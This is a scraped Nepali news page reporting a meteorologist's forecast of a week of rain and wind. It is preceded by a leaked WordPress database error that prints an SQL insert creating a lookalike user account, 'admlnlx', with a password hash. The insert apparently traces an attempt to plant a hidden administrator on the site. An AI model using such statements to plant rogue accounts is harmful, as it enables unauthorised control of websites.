WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpqDmRawnEKBmQ2ghjp236FcYhkAdF/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 16:27:38', '', 'admlnlx', 'admlnlx')

एक हप्तासम्म मौसममा सुधार नआउने – Gaule Khabar

एक हप्तासम्म मौसममा सुधार नआउने

एक हप्तासम्म मौसममा सुधार नआउने

बैशाख २२, काठमाडौं – एक सातासम्म बदली र हावा हुरिसहित पानी पर्ने मौसमविदले बताएका छन् ।

पश्चिमी वायु र बङ्गालको खाडीबाट आएको जलवाष्पयुक्त हावाका कारण मौसम बदली भइ देशका विभिन्न ठाउँमा पानी परेको मौसमविद् गङ्गा नगरकोटीको भनाइ छ ।

यसपालि बङ्गालको खाडीबाट जलवाष्पयुक्त हावा आइरहेकाले लगातार जसो पानी परिरहेको हो । मौसमविद् नगरकोटीले यो साताभरिकै मौसम यस्तै रहने सम्भावना रहेको जानकारी दिएका   छन् । बङ्गालको खाडीबाट जलवाष्पयुक्त हावा आउने क्रम नरोकिएको र पश्चिमी वायुसँगै स्थानीय वायुको पनि प्रभाव भएकाले मौसम बदली भइ लगातार जसो पानी परिरहेको हो ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका